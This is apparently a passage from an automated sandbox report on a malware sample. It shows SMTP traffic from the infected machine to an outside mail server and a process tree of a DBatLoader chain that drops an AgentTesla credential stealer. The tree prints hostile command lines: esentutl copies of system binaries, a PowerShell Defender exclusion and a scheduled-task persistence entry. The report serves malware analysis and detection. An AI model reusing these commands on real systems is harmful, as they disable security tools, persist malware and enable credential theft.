                                                                                                                Nov 26, 2024 08:13:37.981103897 CET49758587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:13:38.256952047 CET5874975951.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:38 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:13:38.257174015 CET49759587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:13:38.380130053 CET5874975851.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:13:38.380337000 CET49758587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:13:38.666889906 CET5874975951.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:13:38.667268038 CET49759587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:13:38.780121088 CET5874975851.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:13:39.077609062 CET5874975951.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:13:48.756012917 CET5874978551.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:48 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:13:48.757528067 CET49785587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:13:49.168035030 CET5874978551.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:13:49.170073986 CET49785587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:13:49.580632925 CET5874978551.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:15:08.845628023 CET5874996051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:08 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:15:08.845767021 CET49960587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:15:09.265270948 CET5874996051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:15:09.265639067 CET49960587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:15:09.688299894 CET5874996051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:16:08.096524954 CET5874999051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:07 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:16:08.096697092 CET49990587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:16:08.505173922 CET5874999051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:16:08.505372047 CET49990587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:16:08.914354086 CET5874999051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:16:17.691826105 CET5874999151.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:17 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:16:17.692122936 CET49991587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:16:18.102489948 CET5874999151.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:16:18.102689981 CET49991587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:16:18.513209105 CET5874999151.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:16:22.067133904 CET5874999251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:21 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:16:22.073551893 CET49992587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:16:22.478148937 CET5874999251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:16:22.478550911 CET49992587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:16:22.883847952 CET5874999251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:17:00.097520113 CET5874999351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:59 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:17:00.101295948 CET49993587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:17:00.519520998 CET5874999351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:17:00.519701004 CET49993587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:17:00.937932968 CET5874999351.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:17:17.343338013 CET5874999451.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:17:16 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:17:17.364305973 CET5874999551.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:17:17 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.

                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:02:12:57
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\Desktop\2jbMIxCFsK.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\2jbMIxCFsK.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'392'640 bytes
                                                                                                                MD5 hash:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:02:13:06
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                                                                                                                Imagebase:0x790000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:02:13:06
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:02:13:07
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                Imagebase:0x130000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:02:13:07
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                Imagebase:0x130000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:02:13:08
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                                                                                                                Imagebase:0x130000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:02:13:08
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:02:13:08
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:9
                                                                                                                Start time:02:13:09
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:250'368 bytes
                                                                                                                MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 82%, ReversingLabs
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:10
                                                                                                                Start time:02:13:09
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                Imagebase:0x740000
                                                                                                                File size:231'936 bytes
                                                                                                                MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:11
                                                                                                                Start time:02:13:12
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                Imagebase:0xef0000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:12
                                                                                                                Start time:02:13:12
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:13
                                                                                                                Start time:02:13:12
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
                                                                                                                Imagebase:0xb30000
                                                                                                                File size:187'904 bytes
                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:14
                                                                                                                Start time:02:13:12
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:15
                                                                                                                Start time:02:13:13
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                Imagebase:0xe40000
                                                                                                                File size:231'936 bytes
                                                                                                                MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                Has exited:false

                                                                                                                Target ID:16
                                                                                                                Start time:02:13:13
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
                                                                                                                Imagebase:0x790000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:17
                                                                                                                Start time:02:13:13
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:18
                                                                                                                Start time:02:13:13
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                Imagebase:0x620000
                                                                                                                File size:231'936 bytes
                                                                                                                MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:20
                                                                                                                Start time:02:13:14
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:timeout 6
                                                                                                                Imagebase:0x210000
                                                                                                                File size:25'088 bytes
                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:21
                                                                                                                Start time:02:13:16
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                Imagebase:0x7ff6ef0c0000
                                                                                                                File size:496'640 bytes
                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:22
                                                                                                                Start time:02:13:22
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'392'640 bytes
                                                                                                                MD5 hash:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                Target ID:23
                                                                                                                Start time:02:13:23
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:24
                                                                                                                Start time:02:13:24
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                Imagebase:0x520000
                                                                                                                File size:250'368 bytes
                                                                                                                MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                Target ID:25
                                                                                                                Start time:02:13:24
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                Imagebase:0x550000
                                                                                                                File size:231'936 bytes
                                                                                                                MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:02:13:30
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'392'640 bytes
                                                                                                                MD5 hash:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Has exited:true

                                                                                                                Target ID:27
                                                                                                                Start time:02:13:31
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:28
                                                                                                                Start time:02:13:32
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                Imagebase:0x110000
                                                                                                                File size:250'368 bytes
                                                                                                                MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                Target ID:29
                                                                                                                Start time:02:13:32
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                Imagebase:0xeb0000
                                                                                                                File size:231'936 bytes
                                                                                                                MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:30
                                                                                                                Start time:02:13:39
                                                                                                                Start date:26/11/2024
